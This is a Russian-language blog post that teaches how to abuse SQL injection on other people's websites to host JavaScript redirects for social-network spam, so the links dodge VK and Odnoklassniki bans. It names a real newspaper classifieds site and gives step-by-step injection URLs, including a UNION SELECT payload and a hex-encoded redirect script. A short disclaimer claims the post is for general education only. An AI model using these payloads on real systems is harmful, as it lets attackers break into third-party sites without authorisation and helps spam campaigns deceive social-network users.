Редиректы на шеллах

Некоторое время назад я занимался добычей трафа с соц. сетей. В начале это был ВК, далее ОД. Везде была одна и та же проблема, бан с удалением всех недавних действий на акке, т.е спама))

В 99% случаев причной был редирект. Редики пробовал самые разные. Самый лучший результат конечно показали редики на шелах. Ну это и понятно. Но такое дело стоит дорого, а добывать самому очень муторно.

 

Находим решение проблемы.

Пришлось думать как же получить редиректы на чужих доменах бесплатно. Потупив пару часов в голову пришла очень хорошая мысля, sql injects. Ну а почему бы и нет?))  

 

Те кто раскручивал хоть раз скулю вспомнят, что сливаем мы данные из БД по средствам SQL команд, результат которых выводится на экран.  Мы же будем выводить на экран нужный нам текс, а именно JS редирект

Редиректы на шеллах

 

Практика

Специально для статьи нашел подходящую ссылочку.

 

 

http://www.jonesborosun.com/classifieds/classitems.php?cat=060'

 

 

Далее я нашел выводную колону

 

 

http://www.jonesborosun.com/classifieds/classitems.php?cat=060'+/*!union*/select+1,1,1,%GOOD_COLUMN%,1,1,1,1,1,1+and+'x'='x

 

 

Теперь самое главное. Мутим редирект.

 

 

<script> location.href = 'http://ya.ru'; </script>

 

 

Это стандарт. Что бы все это дело могло сработать нужно его закодировать в HEX, идем по линку и делаем это

 

 

http://www.crypt-online.narod.ru/crypts/text2hex/

 

 

результат

 

 

3c7363726970743e206c6f636174696f6e2e68726566203d2027687474703a2f2f79612e7275273b203c2f7363726970743e

 

 

ну а теперь подставляем в выводную колонку и радуемся!))

 

 

http://www.jonesborosun.com/classifieds/classitems.php?cat=060'+/*!union*/select+1,1,1,0x3c7363726970743e206c6f636174696f6e2e68726566203d2027687474703a2f2f79612e7275273b203c2f7363726970743e,1,1,1,1,1,1+and+'x'='x

Статья не моя, подкинул один знакомый с какого то форума по социальным сетям, я ей не раз не пользовался и вам не советую, выкладываю ее в ознакомительных целях для общего развития

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *